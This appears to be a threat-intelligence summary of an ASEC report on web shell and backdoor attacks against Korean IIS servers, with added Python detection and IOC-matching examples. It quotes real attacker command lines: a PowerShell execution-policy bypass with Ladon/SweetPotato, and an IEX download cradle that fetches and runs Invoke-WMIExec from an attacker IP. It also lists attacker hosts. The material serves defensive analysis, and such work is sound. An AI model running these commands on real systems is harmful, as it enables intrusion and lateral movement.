Attacks targeting South Korean web servers exploited file upload vulnerabilities to deploy web shells and additional malware, including WogRAT, SuperShell, and MeshAgent, affecting both Windows and Linux systems. The attacker demonstrated techniques for persistence, discovery, privilege escalation, credential access, and lateral movement across organizational networks. #WogRAT #SuperShell #MeshAgent #Ladon #Fscan
Keypoints
- Attackers exploited file upload vulnerabilities on Korean IIS web servers to install web shells such as Chopper, Godzilla, and ReGe-ORG for initial access and persistence.
- ELF-based malware and Windows PE malware were distributed together, indicating targeting of both Linux and Windows systems.
- Backdoor malware WogRAT, developed referencing Tiny SHell, was used with its C&C server matching past aNotepad exploitation cases, suggesting the same attacker.
- Tools like Ladon and PowerLadon were used for privilege escalation, scanning, and stealing credential information.
- Attackers employed SuperShell and MeshAgent for command and control, enabling remote control, file transfer, and web-based remote desktop on multiple platforms.
- Lateral movement was conducted using WMIExec, Ladon, and stolen NT hashes to access additional systems including MS-SQL Servers in the network.
- The attack sequence reveals a sophisticated operation potentially linked to Chinese-speaking threat actors, with goals possibly including data theft or ransomware deployment.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Web shells installed via file upload vulnerabilities on IIS servers (“the attack exploited file upload vulnerabilities of the web server”).
- [T1059] Command and Scripting Interpreter – Use of PowerShell scripts and commands for execution and privilege escalation (“powershell -exec bypass Import-Module .\Ladon.ps1;Ladon SweetPotato whoami”).
- [T1078] Valid Accounts – Theft and use of NT hashes and credentials to move laterally using WMIExec and Ladon (“attacker successfully obtained the NT hash of an admin account and used it to move laterally”).
- [T1021] Remote Services – Use of WMIExec and MS-SQL for lateral movement across the network (“Invoke-WMIExec -Target … -Command ‘whoami’”).
- [T1105] Ingress Tool Transfer – Downloading malware and tools such as Invoke-WMIExec.ps1 and Ladon modules from attacker-controlled servers (“IEX (New-Object Net.WebClient).DownloadString…”).
- [T1071] Application Layer Protocol – Use of SuperShell and MeshAgent for remote control and command execution over network protocols (“SuperShell … supports a reverse shell, allowing remote control”).
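The quoted command lines above (execution-policy bypass, Ladon/SweetPotato, the IEX download cradle, Invoke-WMIExec) are exactly the strings a detection engineer would turn into process-creation rules. The following is an added example, not code from the ASEC report: it runs a small rule set over constructed Sysmon-style events (host, parent image, command line) and separately flags PowerShell spawned by the IIS worker process w3wp.exe, which is the parent-child pattern a web shell produces. The `<target>` value in the second sample event is a placeholder, since the page quotes that argument with an ellipsis.

```python
"""Added example (not from the ASEC report): flag process command lines that show the
execution, download and lateral-movement patterns quoted in the technique list above.
Sample events are constructed for the demo."""
import re

# (technique, label, pattern): one rule per behaviour quoted on the page.
RULES = [
    ("T1059", "execution-policy bypass",
     re.compile(r"-(?:ex\w*|ep)\s+bypass", re.I)),
    ("T1059", "Ladon module load or SweetPotato use",
     re.compile(r"Import-Module\s+\S*Ladon\.ps1|\bLadon\s+SweetPotato\b", re.I)),
    ("T1105", "download cradle via IEX/DownloadString",
     re.compile(r"\bIEX\s*\(\s*New-Object\s+Net\.WebClient\s*\)\s*\.DownloadString", re.I)),
    ("T1021", "WMIExec remote execution",
     re.compile(r"\bInvoke-WMIExec\b", re.I)),
]

# Constructed Sysmon-style events: (host, parent image, command line).
# <target> stands in for the host argument the page elides.
SAMPLE_EVENTS = [
    ("WEB01", "w3wp.exe",
     r"powershell -exec bypass Import-Module .\Ladon.ps1;Ladon SweetPotato whoami"),
    ("WEB01", "w3wp.exe",
     "powershell -c \"IEX (New-Object Net.WebClient).DownloadString("
     "'http://139.180.142.127/Invoke-WMIExec.ps1'); "
     "Invoke-WMIExec -Target <target> -Command 'whoami'\""),
    ("APP02", "explorer.exe",
     r"powershell -NoProfile -File C:\scripts\nightly-backup.ps1"),
    ("APP02", "svchost.exe",
     "powershell -ExecutionPolicy RemoteSigned -Command Get-Service"),
]


def scan_events(events):
    """Return (event_index, technique, label) for every rule that fires on a command line.
    Rules are evaluated in RULES order, so one event can yield several findings."""
    findings = []
    for idx, (_host, _parent, cmd) in enumerate(events):
        for technique, label, pattern in RULES:
            if pattern.search(cmd):
                findings.append((idx, technique, label))
    return findings


def web_server_child_shells(events):
    """Indices of events where the IIS worker process (w3wp.exe) spawned PowerShell.
    This parent-child pair is a strong web shell signal (T1190 follow-on) even when
    the command line itself matches none of the rules above."""
    return [
        i for i, (_host, parent, cmd) in enumerate(events)
        if parent.lower() == "w3wp.exe"
        and re.match(r"\s*(?:\S*\\)?powershell(?:\.exe)?\b", cmd, re.I)
    ]


if __name__ == "__main__":
    for idx, technique, label in scan_events(SAMPLE_EVENTS):
        host, parent, cmd = SAMPLE_EVENTS[idx]
        print(f"{host}: [{technique}] {label} (parent {parent}): {cmd[:60]}...")
    print("IIS-spawned PowerShell events:", web_server_child_shells(SAMPLE_EVENTS))
```

The two benign events show why both checks are kept: a scheduled backup script and a `RemoteSigned` policy neither match a rule nor descend from w3wp.exe, while the web shell activity trips both, which is the corroboration an analyst wants before paging on a single regex hit.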
Indicators of Compromise
- [MD5] Malware file hashes – 06ebef1f7cc6fb21f8266f8c9f9ae2d9, 3f6211234c0889142414f7b579d43c38, and 3 more hashes.
- [URL] Malicious download hosts – http://139.180.142.127/Invoke-WMIExec.ps1, http://45.76.219.39/bb, and others.
- [FQDN] Command and Control domain – linuxwork.net used for managing malware operations.
- [IP addresses] Involved in command and control and malware distribution – 108.61.247.121, 66.42.113.183, 139.180.142.127 among others.
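Indicator lists like the one above are only useful once they are matched against proxy, DNS and endpoint telemetry, and in practice the raw logs and the feed disagree on case, defanging and trailing punctuation. The following is an added example, not part of the report: it loads only the indicator values the page lists (hashes, URLs, the domain, the IPs), normalises candidates extracted from constructed log lines, and reports which line matched which indicator type. The log lines, hostnames and internal addresses are constructed for the demo.

```python
"""Added example (not from the ASEC report): match the report's listed indicators
against constructed proxy / DNS / EDR log lines with normalisation."""
import re

# Indicator values exactly as listed in the summary above (the elided "and others" are not included).
IOC_HASHES = {"06ebef1f7cc6fb21f8266f8c9f9ae2d9", "3f6211234c0889142414f7b579d43c38"}
IOC_URLS = {"http://139.180.142.127/Invoke-WMIExec.ps1", "http://45.76.219.39/bb"}
IOC_DOMAINS = {"linuxwork.net"}
IOC_IPS = {"108.61.247.121", "66.42.113.183", "139.180.142.127"}

# Token extractors. Look-arounds keep "139.180.142.1270" from matching an IOC IP, and the
# domain pattern requires an alphabetic TLD so dotted-quad IPs are not mistaken for hosts.
IP_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
MD5_RE = re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{32}(?![0-9a-fA-F])")
DOMAIN_RE = re.compile(r"(?<![\w.-])(?:[a-z0-9-]+\.)+[a-z]{2,}(?![\w-])", re.I)

KIND_ORDER = {"ip": 0, "domain": 1, "url": 2, "hash": 3}

# Constructed sample telemetry; 10.20.30.0/24 and 203.0.113.5 are placeholder addresses.
SAMPLE_LOGS = [
    "proxy src=10.20.30.40 dst=139.180.142.127 url=http://139.180.142.127/Invoke-WMIExec.ps1 status=200",
    "dns client=10.20.30.41 query=linuxwork[.]net type=A",
    "edr host=WEB01 file=C:\\inetpub\\wwwroot\\upload\\x.aspx md5=3F6211234C0889142414F7B579D43C38",
    "proxy src=10.20.30.42 dst=203.0.113.5 url=http://example.com/index.html status=200",
]


def refang(text):
    """Undo the usual feed defanging (hxxp, [.], [:]) so values compare equal to live logs."""
    return text.replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")


def extract_hits(line):
    """Return sorted (kind, value) pairs for every listed indicator found on one line."""
    text = refang(line)
    found = set()
    for ip in IP_RE.findall(text):
        if ip in IOC_IPS:
            found.add(("ip", ip))
    for dom in DOMAIN_RE.findall(text):
        if dom.lower() in IOC_DOMAINS:
            found.add(("domain", dom.lower()))
    for url in URL_RE.findall(text):
        url = url.rstrip(".,;)")          # strip sentence punctuation glued to the URL
        if url in IOC_URLS:
            found.add(("url", url))
    for digest in MD5_RE.findall(text):
        if digest.lower() in IOC_HASHES:  # EDRs often log hashes upper-case
            found.add(("hash", digest.lower()))
    return sorted(found, key=lambda f: (KIND_ORDER[f[0]], f[1]))


def match_iocs(lines):
    """Map line index -> hits, including only lines that matched at least one indicator."""
    return {i: hits for i, line in enumerate(lines) if (hits := extract_hits(line))}


if __name__ == "__main__":
    for idx, hits in match_iocs(SAMPLE_LOGS).items():
        print(f"line {idx}: {hits}")
```

The URL and the IP on the first proxy line are reported as two separate hits on purpose: the IP match survives even if the attacker rotates the path on the same host, while the exact URL match is the higher-confidence signal. Swapping the four indicator sets for a feed loader is the only change needed to run this over a real export.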
Read more: https://asec.ahnlab.com/en/88627/